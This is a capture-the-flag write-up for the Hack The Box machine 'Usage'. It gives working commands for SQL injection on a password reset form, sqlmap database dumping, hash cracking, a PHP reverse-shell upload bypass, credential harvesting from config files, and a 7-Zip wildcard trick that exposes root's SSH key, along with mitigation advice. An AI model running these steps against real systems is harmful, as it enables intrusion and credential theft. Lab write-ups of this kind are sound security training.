htb-writeups

Usage HTB - Writeup

Machine Information

Reconnaissance

Network Scanning

The initial reconnaissance phase began with a comprehensive Nmap scan to identify open ports and services.

export target=10.129.7.62
sudo nmap -p- --min-rate 5000 -sT -vvv $target

Scan Results:

A follow-up service version detection scan was performed:

sudo nmap -sC -sV -p 22,80 -T4 $target

Web Application Discovery

The web service on port 80 serves a name-based virtual host for usage.htb. Added the domain to /etc/hosts:

echo "10.129.7.62 usage.htb" | sudo tee -a /etc/hosts

Subdomain Enumeration

Using FFUF for subdomain enumeration:

ffuf -c -u 'http://usage.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H 'Host: FUZZ.usage.htb' -fs 178

Discovered Subdomain:

Added the subdomain to /etc/hosts:

echo "10.129.7.62 admin.usage.htb" | sudo tee -a /etc/hosts

Web Application Analysis

The main application at http://usage.htb featured:

Registered a user account at http://usage.htb/registration.

Note: on the password reset form at http://usage.htb/forget-password, entering a registered e-mail address returns “We have e-mailed your password reset link to user@mail.com”.

Note: entering a non-existent e-mail address returns “Email address does not match in our records!”. The difference between the two responses is what makes the lookup observable.

Initial Access

SQL Injection Discovery

The password reset functionality at http://usage.htb/forget-password was vulnerable to SQL injection:

Vulnerable Parameter: email

Proof of Concept:

' or 1=1;-- -
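
To make the flaw and its fix concrete, here is an added example (not code from this writeup or from the target application) that rebuilds the reset-form lookup in Python over an in-memory SQLite table with constructed sample rows; the table and column names are assumed. The string-built query accepts the payload above as SQL and returns the "e-mailed" message for an address that does not exist, while the bound-parameter version treats the same input as a plain string.

```python
import sqlite3

# Constructed sample data standing in for the application's user table.
USERS = [("alice@usage.htb",), ("dash@usage.htb",)]

# The exact value submitted in the email field of the reset form.
PAYLOAD = "' or 1=1;-- -"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?)", USERS)
    return conn


def email_exists_vulnerable(conn, email):
    # The submitted value is spliced into the SQL text: the leading quote
    # closes the literal, "or 1=1" matches every row and ";-- -" comments
    # out the rest of the statement. This mirrors the flaw, not the fix.
    sql = f"SELECT COUNT(*) FROM users WHERE email = '{email}'"
    return conn.execute(sql).fetchone()[0] > 0


def email_exists_safe(conn, email):
    # Bound parameter: the driver passes the value separately from the SQL,
    # so it can only ever be compared as a string. Laravel's query builder
    # and PDO prepared statements bind values the same way.
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE email = ?", (email,)
    ).fetchone()
    return row[0] > 0


def reset_response(conn, email, lookup):
    # The two messages quoted in the notes above form a boolean oracle:
    # the attacker never sees data, only which branch was taken.
    if lookup(conn, email):
        return "We have e-mailed your password reset link to user@mail.com"
    return "Email address does not match in our records!"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", reset_response(db, PAYLOAD, email_exists_vulnerable))
    print("safe:      ", reset_response(db, PAYLOAD, email_exists_safe))
```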

Database Enumeration

Using SQLMap for automated exploitation:

sqlmap -r forget.req --batch --level 5 --risk 3 -p email --threads 10

forget.req

sqlmap -r forget.req --batch --level 5 --risk 3 -p email --threads 10 --dbs

Discovered Databases:

Enumerating tables in the usage_blog database:

sqlmap -r forget.req --batch --level 5 --risk 3 -p email --threads 10 -D usage_blog --tables

Key Tables Identified:

Extracting administrator credentials:

sqlmap -r forget.req --batch --level 5 --risk 3 -p email --threads 10 -D usage_blog -T admin_users --dump

Administrator Credentials:

Password Cracking

Using Hashcat to crack the bcrypt hash:

hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

Cracked Password: whatever1

Admin Panel Access

Successfully logged into the admin panel at http://admin.usage.htb/ using the credentials:

Technology Stack Identified:

Exploitation

Arbitrary File Upload Vulnerability

Laravel v10.18.0 was vulnerable to CVE-2023-24249 (Arbitrary File Upload).

Exploitation Steps:

  1. Payload Preparation:
    • Modified a PHP reverse shell with attacker IP and port

  2. File Upload Bypass:
    • Intercepted the upload request using Burp Suite
    • Modified filename from hello.php.png to hello.php

  3. Shell Execution:
    • Accessed the uploaded shell at http://admin.usage.htb/uploads/images/hello.php
    • Obtained reverse shell as user dash

Stabilizing the Shell

Upgraded to a fully interactive TTY shell for better control.

Privilege Escalation

User Flag

Located and captured the user flag:

cat /home/dash/user.txt

User Flag: e3113fbd4c794577f05fcb58f98cc3eb

Credential Discovery

Discovered Monit configuration file with credentials:

cat /home/dash/.monitrc

Discovered Credentials:

Lateral Movement

User Enumeration

Identified system users:

grep 'sh$' /etc/passwd

Users with Shell Access:

Lateral Movement to Xander

Used discovered credentials to access xander’s account:

su xander

Password: 3nc0d3d_pa$$w0rd

Privilege Escalation Vector

Analyzed sudo privileges for xander:

sudo -l

Sudo Privileges:

Root Access

Binary Analysis

Analyzed the privileged binary:

strings /usr/bin/usage_management

Binary Functionality:

7-Zip Wildcard Exploitation

Exploited 7-Zip’s wildcard handling vulnerability:

Exploitation Steps:

  1. Create Symbolic Links:
    cd /var/www/html
    ln -s /root/.ssh/id_rsa file
    touch @file

  2. Execute Privileged Binary:
    sudo /usr/bin/usage_management

    Selected option 1 (Project Backup)

  3. Extract Root SSH Key:
    • The backup process followed symbolic links
    • Root’s private SSH key was included in the backup
Root Shell Access

  1. Transfer and Secure SSH Key:
    chmod 600 root_key

  2. SSH as Root:
    ssh -i root_key root@10.129.7.62

Root Flag Capture

Located and captured the root flag:

cat /root/root.txt

Root Flag: 348556f166e6f970b0db614541475b5f

Summary

This penetration test demonstrated a comprehensive attack chain:

  1. Information Gathering: Network scanning and subdomain enumeration
  2. Vulnerability Discovery: SQL injection in password reset functionality
  3. Credential Access: Database enumeration and password cracking
  4. Initial Compromise: Arbitrary file upload leading to web shell
  5. Lateral Movement: Credential reuse across user accounts
  6. Privilege Escalation: Wildcard injection in privileged 7-Zip operations

The attack leveraged multiple security weaknesses including input validation flaws, credential management issues, and improper privilege separation.

Mitigation Recommendations

  1. Implement proper input validation and parameterized queries
  2. Enforce strong password policies and implement multi-factor authentication
  3. Apply principle of least privilege for service accounts
  4. Regularly update frameworks and dependencies
  5. Implement proper file upload validation and storage
  6. Conduct regular security assessments and penetration testing

This writeup is for educational purposes only. Always ensure you have proper authorization before conducting security testing.